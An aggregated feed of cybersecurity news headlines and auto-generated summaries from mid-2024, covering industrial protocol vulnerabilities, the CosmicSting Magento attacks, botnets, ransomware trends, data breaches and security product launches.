  Researchers Uncover Major Security Vulnerabilities in Industrial MMS Protocol Libraries

  industry
  2024-10-09 https://thehackernews.com/2024/10/researchers-uncover-major-security.html
  Details have emerged about multiple security vulnerabilities in two implementations of the Manufacturing Message Specification (MMS) protocol that, if successfully exploited, could have severe impacts in industrial environments. "The vulnerabilities could allow an attacker to crash an industrial device or in some cases, enable remote code execution," Claroty researchers Mashav Sapir and Vera "

  Autosummary: A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2971 (CVSS score: 8.6) - A type confusion vulnerability in libIEC61850 that could allow an attacker to crash the server with a malicious payload CVE-2022-2972 (CVSS score: 10.0) - A stack-based buffer overflow vulnerability in libIEC61850 that could lead to a crash or remote code execution CVE-2022-2973 (CVSS score: 8.6) - "

  ---

  BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities

  industry
  2024-10-08 https://www.helpnetsecurity.com/2024/10/08/breachlock-attack-surface-analytics/
  

  BreachLock strengthens continuous threat exposure management (CTEM) capabilities for enterprise customers with its new Attack Surface Analytics feature. Time is of the essence when Fortune 500 security teams find themselves waking up to a Code Red vulnerability being actively exploited. When CISOs urgently request a detailed list of impacted assets, including those running a specific TLS version, which ports are being used, servers involved, and more, along with a patching strategy, that’s where BreachLock’s new … More →

  The post BreachLock Attack Surface Analytics strengthens enterprise CTEM capabilities appeared first on Help Net Security.

  "

  Autosummary: The feature provides enterprise users with: All relevant asset intelligence consolidated into a single, consolidated, cumulative view, with details on the correlation between domains, subdomains, IP addresses and ports, and associated technologies. "

  ---

  Thousands of Adobe Commerce e-stores hacked by exploiting the CosmicSting bug

  exploits industry
  2024-10-03 https://securityaffairs.com/169316/cyber-crime/4000-unpatched-adobe-commerce-and-magento-stores-hacked.html
  Over 4,000 unpatched Adobe Commerce and Magento stores have been compromised by exploiting critical vulnerability CVE-2024-34102. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. The flaw is an Improper Restriction […] "

  Autosummary: Threat groups exploiting this vulnerability include Bobry, Polyovki (infecting over 650 stores), Surki, Burunduki, Ondatry, Khomyaki, and Belki. Sansec researchers reported that multiple threat actors have exploited a critical Adobe Commerce vulnerability, tracked as CVE-2024-34102 (aka CosmicSting, CVSS score of 9.8), to compromise more than 4,000 e-stores over the past three months. "

  ---

  Over 4,000 Adobe Commerce, Magento shops hacked in CosmicSting attacks

  industry
  2024-10-03 https://www.bleepingcomputer.com/news/security/over-4-000-adobe-commerce-magento-shops-hacked-in-cosmicsting-attacks/
  Approximately 5% of all Adobe Commerce and Magento online stores, or 4,275 in absolute numbers, have been hacked in "CosmicSting" attacks. [...] "

  Autosummary: Website administrators are strongly advised to move to the following versions (or later) as soon as possible: Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Extended Support 2.4.3-ext-8, 2.4.2-ext-8, 2.4.1-ext-8, 2.4.0-ext-8, 2.3.7-p4-ext-8 Magento Open Source 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9 Adobe Commerce Webhooks Plugin version 1.5.0 Sansec has provided a tool to check if their site is vulnerable and an "emergency hotfix" has been released to block most CosmicSting attacks, with both available here. "

  ---

  Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

  exploits industry
  2024-10-02 https://thehackernews.com/2024/10/alert-adobe-commerce-and-magento-stores.html
  Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting. Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming, "

  Autosummary: "

  ---

  Veeam Recon Scanner identifies adversary tactics, techniques, and procedures

  industry
  2024-10-01 https://www.helpnetsecurity.com/2024/10/01/veeam-recon-scanner/
  

  Veeam Software announced the addition of new Veeam Recon Scanner technology to Veeam Data Platform. This technology, developed by Coveware by Veeam, draws on years of experience in cyber-extortion incident response and the largest database of cyber incidents in the world. Veeam Recon Scanner is designed to proactively identify, triage, and prevent cyberattacks, revolutionizing threat assessment in the data protection market. “Protecting your organization from a cyber-attack requires a coordinated strategy. It starts at the … More →

  The post Veeam Recon Scanner identifies adversary tactics, techniques, and procedures appeared first on Help Net Security.

  "

  Autosummary: “By collecting and analyzing data proactively, Recon Scanner identifies unexpected network connections, unusual user behavior, suspicious file activity, data exfiltration attempts, and even potential brute force attacks. "

  ---

  They were arrested for posting during the riots – will it change anything?

  industry
  2024-09-27 https://www.bbc.com/news/articles/cr548zdmz3jo
  Charges following disorder felt significant, but for social media giants there was no day of reckoning. "

  Autosummary: And nor, it seems, for the social media giants whose algorithms, time and time again, are accused of prioritising engagement over safety, pushing content regardless of the reaction it can provoke.Kay, 26, and Parlour, 28, have been sentenced to 38 months and 20 months in prison respectively for stirring up racial hatred online during the summer riots.But while accountability has been felt at “the very sharp end” by those who participated in the disorder and posted hateful content online, Mr Jukes said “the people who make billions from providing those opportunities” to post harmful content on social media “have not really paid any price at all”.The UK’s head of counter-terror policing, Assistant Commissioner Matt Jukes, told me for the BBC’s Newscast that “X was an enormous driver” of posts that contributed to the summer’s disorder. "

  ---

  3 tips for securing IoT devices in a connected world

  industry
  2024-09-27 https://www.helpnetsecurity.com/2024/09/27/iot-devices-security/
  

  IoT devices have become integral to how many organizations operate. From Smart TVs in conference rooms to connected sensors and wireless security cameras, these connected devices are now a fixture in the modern workplace. They also, however, present a real and often overlooked cybersecurity threat. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, … More →

  The post 3 tips for securing IoT devices in a connected world appeared first on Help Net Security.

  "

  Autosummary: When segmenting your network, organizations should: Isolate IoT devices Use VLANs and firewalls with security controls between network segments Employ zero-trust architecture Access control is the process of defining and enforcing policies that dictate who or what can access specific resources within a network. An effective, comprehensive approach to IoT security requires organizations to have complete visibility into all connected devices within their network, addressing common vulnerabilities such as built-in backdoors and outdated firmware, alongside ensuring secure deployment practices. "

  ---

  Threat landscape for industrial automation systems. Q2 2024

  industry
  2024-09-26 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-q2-2024/
  In the second quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.9 pp from the previous quarter to 23.5%. Compared to the second quarter of 2023, the percentage decreased by 3.3 pp. "

  Autosummary: Q2 in numbers Parameter Q1 2024 Q2 2024 Quarterly changes Global percentage of attacked ICS computers 24.40% 23.50% -0.9 pp Percentage of ICS computers on which malicious objects from different categories were blocked Denylisted internet resources 6.84% 6.63% -0.21 pp Malicious scripts and phishing pages (JS and HTML) 5.84% 5.69% -0.15 pp Spy Trojans, backdoors and keyloggers 3.90% 4.08% 0.18 pp Malicious documents (MSOffice + PDF) 1.72% 1.96% 0.24 pp Viruses 1.56% 1.54% -0.02 pp Worms 1.51% 1.48% -0.03 pp Miners in the form of executable files for Windows 0.92% 0.89% -0.03 pp Web miners running in browsers 0.49% 0.50% 0.01 ppThis group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Сomputers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Malicious object categories Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose: Malicious objects used for initial infection Next-stage malware Self-propagating malware Malicious objects used for initial infection Malicious objects used for initial infection include dangerous web resources, malicious scripts, and malicious documents. Percentage of ICS computers on which malicious objects were blocked, by month, 2022-2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 11.3% in Northern Europe to 30% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 The percentage of ICS computers on which malicious objects were blocked in the second quarter of 2024 was highest in May and lowest in June. "

  ---

  CISA warns hackers targeting industrial systems with “unsophisticated methods” as claims made of Lebanon water hack

  industry
  2024-09-26 https://www.tripwire.com/state-of-security/cisa-warns-hackers-targeting-industrial-systems-unsophisticated-methods
  The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that hackers continue to be capable of compromising industrial control systems (ICS) and other operational technology (OT) using "unsophisticated methods" - suggesting that much more still needs to be done to secure them properly. Meanwhile, a pro-Israel hacking group claims to have changed chlorine levels at water facilities in Lebanon. Read more in my article on the Tripwire State of Security blog. "

  Autosummary: Industrial control systems manage and regulate processes in the WWS sector such as water filtration, chemical treatment, and pumping stations - ensuring that they operate within safe parameters, maintain the quality of drinking water, and prevent contamination to the environment. "

  ---

  Critical RCE vulnerability found in OpenPLC

  exploits industry
  2024-09-26 https://securityaffairs.com/168953/ics-scada/openplc-critical-flaw.html
  Cisco’s Talos reported critical and high-severity flaws in OpenPLC that could lead to DoS condition and remote code execution. Cisco’s Talos threat intelligence unit has disclosed details of five newly patched vulnerabilities in OpenPLC, an open-source programmable logic controller. These vulnerabilities can be exploited to trigger a denial-of-service (DoS) condition or execute remote code. OpenPLC […] "

  Autosummary: The remaining DoS flaws discovered by Talos are tracked as CVE-2024-36980, CVE-2024-36981, CVE-2024-39589, and CVE-2024-39590. "

  ---

  ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations

  industry
  2024-09-25 https://www.helpnetsecurity.com/2024/09/25/manageengine-analytics-plus-6-0/
  

  ManageEngine announced a significant upgrade to its flagship IT analytics solution, Analytics Plus. Version 6.0 introduces Spotlight, a contextual recommendations engine powered by AI, designed to identify key inefficiencies in IT operations and suggest corrective strategies. The 2023 State of Analytics Engineering report found that time to business insight is the biggest challenge for nearly 50% of surveyed directors. Spotlight dramatically reduces the time IT managers and CIOs spend analyzing various IT metrics and coming … More →

  The post ManageEngine Analytics Plus 6.0 identifies key inefficiencies in IT operations appeared first on Help Net Security.

  "

  Autosummary: Deriving meaningful and context-specific insights is becoming increasingly challenging due to a significant disconnect: the people performing the analysis are skilled at mining data but often lack the IT context, making it difficult to translate findings into actionable business decisions,” said Samantha Hall, service delivery manager, Leathams Ltd., a UK-based food supplying company. In addition to these key features, Analytics Plus version 6.0 includes a range of productive enhancements such as multivariate forecasting, workflow charts, support for distributed processing (on-premises) and more than 10 new integrations with popular IT tools. "

  ---

  CISA: Hackers target industrial systems using “unsophisticated methods”

  industry
  2024-09-25 https://www.bleepingcomputer.com/news/security/cisa-hackers-target-industrial-systems-using-unsophisticated-methods/
  ​CISA warned today of threat actors trying to breach critical infrastructure networks by targeting Internet-exposed industrial devices using "unsophisticated" methods like brute force attacks and default credentials. [...] "

  Autosummary: "

  ---

  MFA bypass becomes a critical security issue as ransomware tactics advance

  exploits ransomware industry
  2024-09-24 https://www.helpnetsecurity.com/2024/09/24/ransomware-session-hijacking-tactics/
  

  Ransomware is seen as the biggest cybersecurity threat across every industry, with 75% of organizations affected by ransomware more than once in the past 12 months – a jump from 61% in 2023, according to SpyCloud. Session hijacking surges as major ransomware threat Traditional tools and solutions like antivirus and MFA are not infallible. For organizations affected by ransomware in the past year, MFA bypass via session hijacking is seen as the greatest emerging threat … More →

  The post MFA bypass becomes a critical security issue as ransomware tactics advance appeared first on Help Net Security.

  "

  Autosummary: Insurance: 6.3x more likely to experience a ransomware attack Healthcare: 2.1x more likely to experience a ransomware attack CIOs, CISOs, and other IT security executives (91%) are almost twice as confident than their security practitioner counterparts (54%) in their organization’s ability to prevent a full-blown ransomware attack – outlining an alarming disconnect between key decision makers and front-line teams on their preparedness for this costly threat. Rise of infostealer malware and digital identity exposure Cybercriminals have pivoted to next-generation tactics, using information-stealing malware (or “infostealers”) to siphon digital identity data, authentication details, and session cookies from infected users and selling this information to ransomware operators – leaving virtually every respondent (99.8%) concerned about this trend. "

  ---

  Discover Latest Ransomware Tactics and Zero Trust Strategies in This Expert Webinar

  exploits ransomware industry
  2024-09-24 https://thehackernews.com/2024/09/discover-latest-ransomware-tactics-and.html
  Ransomware is no longer just a threat; it"s an entire industry. Cybercriminals are growing more sophisticated, and their tactics are evolving rapidly. This persistent danger is a major concern for business leaders. But there"s good news: you don"t have to be defenseless. What if you could gain a strategic edge? Join our exclusive webinar, "Unpacking the 2024 Ransomware Landscape: Insights and "

  Autosummary: In this informative session, you will: Go Beyond the Headlines : Explore the details behind recent ransomware incidents and uncover how attackers infiltrate, encrypt, and extort their victims. "

  ---

  Transportation, logistics companies targeted with lures impersonating fleet management software

  industry
  2024-09-24 https://www.helpnetsecurity.com/2024/09/24/transportation-logistics-malware-attacks/
  

  Financially motivated threat actors are targeting North American companies in the transportation and logistics sector with tailored lures, info-stealing malware, and a clever new trick. How the attack unfolds According to Proofpoint threat researchers, the attackers start by compromising email accounts of workers in transportation and shipping companies and then responding to existing email conversations within the account’s inbox. The emails are usually short, and initially urged recipients to follow a link to / download … More →

  The post Transportation, logistics companies targeted with lures impersonating fleet management software appeared first on Help Net Security.

  "

  Autosummary: In these limited campaigns, the delivered malware included info-stealers (Lumma Stealer, StealC, ArechClient2, DanaBot) and remote control software (NetSupport). "

  ---

  Critical Flaw in Microchip ASF Exposes IoT Devices to Remote Code Execution Risk

  industry
  2024-09-23 https://thehackernews.com/2024/09/critical-flaw-in-microchip-asf-exposes.html
  A critical security flaw has been disclosed in the Microchip Advanced Software Framework (ASF) that, if successfully exploited, could lead to remote code execution. The vulnerability, tracked as CVE-2024-7490, carries a CVSS score of 9.5 out of a maximum of 10.0. It has been described as a stack-based overflow vulnerability in ASF"s implementation of the tinydhcp server stemming from a lack of "

  Autosummary: "

  ---

  Essential metrics for effective security program assessment

  industry
  2024-09-19 https://www.helpnetsecurity.com/2024/09/19/alex-spivakovsky-pentera-security-programs/
  

  In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. Spivakovsky explains how automation and proactive testing can reveal vulnerabilities and improve overall security posture. What are the most effective metrics for measuring the success of a security program? The most straightforward metric is: Has your organization been breached? If the answer is yes, it’s clear there’s work to be … More →

  The post Essential metrics for effective security program assessment appeared first on Help Net Security.

  "

  Autosummary: The formula typically used is: ROSI = (Losses avoided – Cost of security measures) / Cost of security measures For example, if a security program prevents $1 million in potential breach losses and costs $250,000 to implement, the ROSI would be 3, meaning a return of $3 for every $1 spent on security.Internal security teams tend to be small, relative to the overall organization, and cannot be everywhere; all employees need to understand how their actions can impact overall the organizational security posture and practice proper security hygiene.In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs.This helps executive management and board members, who are typically more business-focused, and less familiar with cybersecurity concepts, to better understand the impact of security initiatives. "

  ---

  Forescout for OT Security secures OT, IoT, and IT hybrid environments

  industry
  2024-09-19 https://www.helpnetsecurity.com/2024/09/19/forescout-for-ot-security/
  

  Forescout announced its new SaaS Operational Technologies (OT) solution. Forescout for OT Security is a security solution that allows organizations to secure complex, heterogeneous OT, IoT/IoMT, and IT environments whether they are fully in cloud, completely air-gapped, or hybrid. Forescout for OT Security combines: Proactive security and exposure management Threat detection powered by Forescout Research – Vedere Labs’ proprietary threat research of unmanaged devices Critical operational monitoring Control across cloud and on-premises networks “The attack … More →

  The post Forescout for OT Security secures OT, IoT, and IT hybrid environments appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

  exploits industry
  2024-09-18 https://thehackernews.com/2024/09/north-korean-hackers-target-energy-and.html
  A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is "

  Autosummary: The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia. "

  ---

  New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide

  industry
  2024-09-18 https://thehackernews.com/2024/09/new-raptor-train-iot-botnet-compromises.html
  Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett). The sophisticated botnet, dubbed Raptor Train by Lumen"s Black Lotus Labs, is believed to have been operational since at least May 2020, "

  Autosummary: Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel. "

  ---

  Experts warn of China-linked APT’s Raptor Train IoT Botnet

  industry
  2024-09-18 https://securityaffairs.com/168563/malware/raptor-train-botnet-iot.html
  Researchers warn of a new IoT botnet called Raptor Train that already compromised over 200,000 devices worldwide. Cybersecurity researchers from Lumen’s Black Lotus Labs discovered a new botnet, named Raptor Train, composed of small office/home office (SOHO) and IoT devices. The experts believe the botnet is controlled by a Chine-linked APT group Flax Typhoon (also […] "

  Autosummary: Below are some of the devices included in the botnet: Modems/Routers ActionTec PK5000 ASUS RT-*/GT-*/ZenWifi TP-LINK DrayTek Vigor Tenda Wireless Ruijie Zyxel USG* Ruckus Wireless VNPT iGate Mikrotik TOTOLINK IP Cameras D-LINK DCS-* Hikvision Mobotix NUUO AXIS Panasonic NVR/DVR Shenzhen TVT NVRs/DVRs NAS QNAP (TS Series) Fujitsu Synology The attribution of the Raptor Train botnet to the Chinese nation-state actor is based on multiple factors, including the operational timelines, targeting of sectors aligned with Chinese interests, use of the Chinese language, and other tactics, techniques, and procedures (TTPs) that overlap with known Chinese cyber activities. "

  ---

  23andMe to pay $30 million in genetics data breach settlement

  financial industry
  2024-09-13 https://www.bleepingcomputer.com/news/security/23andme-to-pay-30-million-in-genetics-data-breach-settlement/
  DNA testing giant 23andMe has agreed to pay $30 million to settle a lawsuit over a data breach that exposed the personal information of 6.4 million customers in 2023. [...] "

  Autosummary: "23andMe denies the claims and allegations set forth in the Complaint, denies that it failed to properly protect the Personal Information of its consumers and users, and further denies the viability of Settlement Class Representatives’ claims for statutory damages," the company said in the filed preliminary settlement. "

  ---

  NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics

  industry
  2024-09-12 https://www.helpnetsecurity.com/2024/09/12/netscout-cyber-intelligence-platform/
  

  NETSCOUT announced updates to its advanced, scalable deep packet inspection-based Omnis Cyber Intelligence Network Detection and Response (NDR) platform. New MITRE ATT&CK behavioral analytics enable earlier detection of advanced threats like ransomware, suspicious traffic, or unauthorized access attempts while improving remediation to help meet industry and country compliance requirements. “Digital resilience allows enterprises to continuously operate and quickly leverage digital opportunities to serve their customers, especially during economically challenging times,” stated Fernando Montenegro, senior principal … More →

  The post NETSCOUT enhances Omnis Cyber Intelligence platform with MITRE ATT&CK behavioral analytics appeared first on Help Net Security.

  "

  Autosummary: “NETSCOUT helps its customers strengthen their digital resilience by enabling easier detection, faster response, and more effective recovery from cyber threats,” stated Jerry Mancini, senior director, office of the CTO, NETSCOUT. "

  ---

  Saviynt Intelligence delivers identity security analytics through ML and AI capabilities

  industry
  2024-09-11 https://www.helpnetsecurity.com/2024/09/11/saviynt-intelligence-suite/
  

  Saviynt announced the release of its Intelligence Suite with general availability of Intelligent Recommendations, which will provide customers with dynamic roles, access recommendations, actionable insights, and a multi-dimensional weighted trust scoring model that will be a true game changer. “Saviynt Intelligence will transform identity security from a set of purely operational processes into ones that are automated with artificial intelligence (AI) and machine learning (ML). Our experience is that this actionable intelligence will reduce access … More →

  The post Saviynt Intelligence delivers identity security analytics through ML and AI capabilities appeared first on Help Net Security.

  "

  Autosummary: This is Saviynt’s third-generation peer analytics engine, capable of analyzing distinct peer clusters for various identity types, including workforce, contractors, externals, machines, and privileged accounts. "

  ---

  Quad7 botnet evolves to more stealthy tactics to evade detection

  industry
  2024-09-10 https://securityaffairs.com/168250/malware/quad7-botnet-evolves.html
  The Quad7 botnet evolves and targets new  SOHO devices, including Axentra media servers, Ruckus wireless routers and Zyxel VPN appliances. The Sekoia TDR team identified additional implants associated with the Quad7 botnet operation. The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and […] "

  Autosummary: The botnet operators are targeting multiple SOHO devices and VPN appliances, including TP-LINK, Zyxel, Asus, D-Link, and Netgear, exploiting both known and previously unknown vulnerabilities. "

  ---

  TIDRONE APT targets drone manufacturers in Taiwan

  industry
  2024-09-09 https://securityaffairs.com/168210/apt/tidrone-targets-organizations-taiwan.html
  A previously undocumented threat actor tracked TIDRONE targets organizations in military and satellite industries in Taiwan. Trend Micro spotted an allegedly China-linked threat actor, tracked TIDRONE, targeting drone manufacturers in Taiwan. The group, which was previously undocumented, uses enterprise resource planning (ERP) software and remote desktops to deploy advanced malware, including CXCLNT and CLNTEND. CXCLNT […] "

  Autosummary: Since April, the group used CLNTEND, a previously undetected remote access tool (RAT), which supports a wider range of network protocols for communication, further enhancing their capabilities. "

  ---

  The future of automotive cybersecurity: Treating vehicles as endpoints

  industry ciber
  2024-09-05 https://www.helpnetsecurity.com/2024/09/05/automotive-cybersecurity-future/
  

  The automotive industry is facing many of the same cybersecurity risks and threats that successful organizations in other sectors are up against, but it’s also battling some distinct ones. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the … More →

  The post The future of automotive cybersecurity: Treating vehicles as endpoints appeared first on Help Net Security.

  "

  Autosummary: Advanced persistent threat groups, such as APT4, APT6 and APT37, are notorious for their focus on intellectual property theft, especially in industries where proprietary technology and competitive advantage are critical. Given the proprietary nature and immense competitive value of automotive technology, these firms must be particularly vigilant against espionage attempts, as the consequences of a successful attack could be devastating both financially and reputationally, potentially leading to lost market share and long-term erosion of trust. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the future of automotive cybersecurity. Every technology, no matter how advanced, comes with its own set of weaknesses, and automotive technology is no exception. "

  ---

  How ransomware tactics are shifting, and what it means for your business

  exploits ransomware industry
  2024-09-03 https://www.helpnetsecurity.com/2024/09/03/tim-west-withsecure-ransomware-tactics-shifting/
  

  In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem. West talks about the implications of these changes for targeted industries, particularly engineering and manufacturing, and examines ransomware actors’ growing reliance on dual-use tools. How has the ransomware-as-a-service (RaaS) landscape evolved? Are we seeing a shift in … More →

  The post How ransomware tactics are shifting, and what it means for your business appeared first on Help Net Security.

  "

  Autosummary: The tools we found to be commonly used by RaaS actors included PDQ Connect, Action1, AnyDesk, and TeamViewer for remote access, as well as rclone, rsync, Megaupload, and FileZilla for data exfiltration.In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem.At the same time, from a defender’s perspective, the mistrust among cybercriminals is beneficial, as it likely makes them less effective, less efficient, and easier to defend against. Proprietary data and intellectual property (IP), including designs, blueprints, and trade secrets are critical to maintaining a competitive edge, and therefore lucrative assets for theft or sale. At the same time, traditional defences against ransomware encryption, such as backup strategies and network segmentation, remain important. "

  ---

  U.S. oil giant Halliburton disclosed a data breach

  financial industry
  2024-09-03 https://securityaffairs.com/168002/data-breach/halliburton-data-breach.html
  U.S. oil company Halliburton disclosed a data breach following the RansomHub ransomware gang attack that occurred in August. In August, Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which is […] "

  Autosummary: “The Company remains subject to various risks due to the incident, including the adequacy of processes during the period of disruption, diversion of management’s attention, potential litigation, changes in customer behavior, and regulatory scrutiny.” continues the document. "

  ---

  Young workers drive South Africa"s video games industry

  industry
  2024-09-02 https://www.bbc.com/news/articles/c6ppjq0zz1go
  South Africa has a small but thriving video games industry, helped by plenty of young workers. "

  Autosummary: “These days we’ve got a truly diverse cross section of South Africa coming to the event, all ages, races, and genders,” says rAge project director, Michael James.“Though on the surface things may seem to be moving slowly right now, when a lot of these new projects, teams, and companies reveal themselves, there is going to be a massive wave of South African content in the industry.” Carina Cristovao Rodwin Malinga sees a "massive wave" of South African games content coming As well as having a new wave of game developers, South Africa is a growing market for games themselves, points out Chris Beer, an analyst at GWI. "

  ---

  SANS Institute Unveils Critical Infrastructure Strategy Guide for 2024: A Call to Action for Securing ICS/OT Environments

  industry
  2024-08-30 https://thehackernews.com/2024/08/sans-institute-unveils-critical.html
  A comprehensive guide authored by Dean Parsons emphasizes the growing need for specialized ICS security measures in the face of rising cyber threats. With a staggering 50% increase in ransomware attacks targeting industrial control systems (ICS) in 2023, the SANS Institute is taking decisive action by announcing the release of its essential new strategy guide, "ICS Is the Business: Why Securing "

  Autosummary: "These are the attacks that keep security CSOs, VP of Engineering and others responsible for ICS cyber defense, safety, and risk management, up at night," Parsons notes. "

  ---

  Cybercriminals capitalize on travel industry’s peak season

  industry ciber
  2024-08-28 https://www.helpnetsecurity.com/2024/08/28/cybercriminals-capitalize-travel-season/
  

  Cybercriminals are capitalizing on the travel and hospitality industry’s peak season, using increased traffic as cover for their attacks, according to Cequence Security. Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. Threat researchers observed a consistent pattern across industries: increased website traffic during peak seasons, like the travel and hospitality industry’s vacation and holiday periods, coincides with a surge in … More →

  The post Cybercriminals capitalize on travel industry’s peak season appeared first on Help Net Security.

  "

  Autosummary: Researchers investigated the top 10 travel and hospitality sites to identify externally visible edge, cloud infrastructure, application stack, API hosts, and security vulnerabilities. "

  ---

  Old devices, new dangers: The risks of unsupported IoT tech

  industry
  2024-08-27 https://www.welivesecurity.com/en/internet-of-things/old-devices-new-dangers-the-risks-of-unsupported-iot-tech/
  In the digital graveyard, a new threat stirs: Out-of-support devices becoming thralls of malicious actors "

  Autosummary: However, the takeaway from all this is that you should always keep your devices updated, and when that is not possible, try to dispose of them securely (wiping old data), replace them with a new device after secure disposal, or find them a new, much-less-connected purpose.Devices such as cameras, teleconferencing systems, routers, and smart locks have operating systems or firmware that, once obsolete, no longer receive security updates, leaving the door open to hacking or other misuse. "

  ---

  Fraud tactics and the growing prevalence of AI scams

  financial industry
  2024-08-23 https://www.helpnetsecurity.com/2024/08/23/fraud-tactics-ai-scams/
  

  In the first six months of 2024, Hiya flagged nearly 20 billion calls as suspected spam – more than 107 million spam calls everyday. The data showed spam flag rates of more than 20% of unknown calls (calls coming from outside of someone’s address book) in 25 out of the 42 countries – with some spam flag rates above 50%. The first half of 2024 also saw an increase in AI deepfake scams, which use … More →

  The post Fraud tactics and the growing prevalence of AI scams appeared first on Help Net Security.

  "

  Autosummary: The rate of spam flag rate varies state by state, with Oklahoma, Indiana, and Ohio having the highest spam rates in H1, while Alaska, New York, and North Dakota had the lowest. "

  ---

  The changing dynamics of ransomware as law enforcement strikes

  exploits ransomware industry
  2024-08-23 https://www.helpnetsecurity.com/2024/08/23/changing-dynamics-of-ransomware/
  

  After peaking in late 2023, the ransomware industry is beginning to stabilize in productivity, with notable developments in ransomware targets, and industry dynamics, according to WithSecure. Sectors impacted by ransomware (Source: WithSecure) While ransomware productivity has shown signs of leveling off in 2024, the frequency of attacks and ransom payments collected remained higher in the first half of 2024 than in 2022 and 2023. “There has been a marked shift towards targeting small and medium-sized … More →

  The post The changing dynamics of ransomware as law enforcement strikes appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  US oil giant Halliburton confirms cyberattack behind systems shutdown

  industry ciber
  2024-08-23 https://www.bleepingcomputer.com/news/security/us-oil-giant-halliburton-confirms-cyberattack-behind-systems-shutdown/
  ​Halliburton, one of the world"s largest providers of services to the energy industry, has confirmed a cyberattack that forced it to shut down some of its systems earlier this week. [...] "

  Autosummary: "On August 21, 2024, Halliburton Company (the "Company") became aware that an unauthorized third party gained access to certain of its systems," the oil services giant said in a filing with the U.S. Securities and Exchange Commission (SEC). "

  ---

  A cyberattack hit US oil giant Halliburton

  industry ciber
  2024-08-22 https://securityaffairs.com/167435/hacking/halliburton-cyberattack.html
  US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which […] "

  Autosummary: A cyberattack hit US oil giant Halliburton Pierluigi Paganini August 22, 2024 August 22, 2024 US oil giant Halliburton announced that it was hit by a cyberattack that is affecting operations at its Houston, Texas offices. "

  ---

  A backdoor in millions of Shanghai Fudan Microelectronics RFID cards allows cloning

  industry
  2024-08-21 https://securityaffairs.com/167321/hacking/shanghai-fudan-microelectronics-rfid-cards-backdoor.html
  A flaw in millions of RFID cards manufactured by Shanghai Fudan Microelectronics allows these contactless cards to be cloned instantly. Researchers from security firm Quarkslab discovered a backdoor in millions of RFID cards manufactured by the Chinese chip manufacturer Shanghai Fudan Microelectronics. The experts announced the discovery of a hardware backdoor and successfully cracked its […] "

